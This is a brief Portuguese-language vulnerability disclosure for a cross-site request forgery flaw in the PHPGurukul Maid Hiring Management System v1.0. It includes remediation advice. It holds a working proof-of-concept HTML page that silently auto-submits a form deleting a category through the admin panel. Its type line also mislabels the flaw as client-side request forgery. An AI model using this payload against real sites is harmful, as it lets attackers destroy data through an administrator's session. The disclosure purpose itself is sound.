
Prova de conceito para uma vulnerabilidade CSRF no PHPGurukul Maid Hiring Management System v1.0, demonstrando exclusão não autorizada de categorias por meio de links maliciosos criados.
Nome do Projeto e URL do Repositório: Maid Hiring Management System using PHP and MySQL
Tipo de Vulnerabilidade: Falsificação de Solicitação do Lado do Cliente
Versões Afetadas: v1.0
💣Descrição da Vulnerabilidade: Existe uma vulnerabilidade de Cross-Site Request Forgery (CSRF) no painel de administração do PHPGurukul Hiring Management System, permitindo que um atacante exclua categorias de contratação arbitrárias ao enganar um administrador autenticado para visitar um site malicioso. Isso pode levar à exclusão de dados e alterações não autorizadas no nível de administrador.
👩💻Impacto: Exclusão não autorizada de categorias.
🛜Prova de Conceito (PoC):

/admin/manage-category.php
CSRF-POC<html>
<body>
<form action="http://127.0.0.1/mhms/admin/manage-category.php">
<input type="hidden" name="delid" value="13" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>


Recomendação: Implementação de tokens CSRF em formulários de administração, aplicar cookies SameSite e validar a origem da solicitação para evitar ações não autorizadas.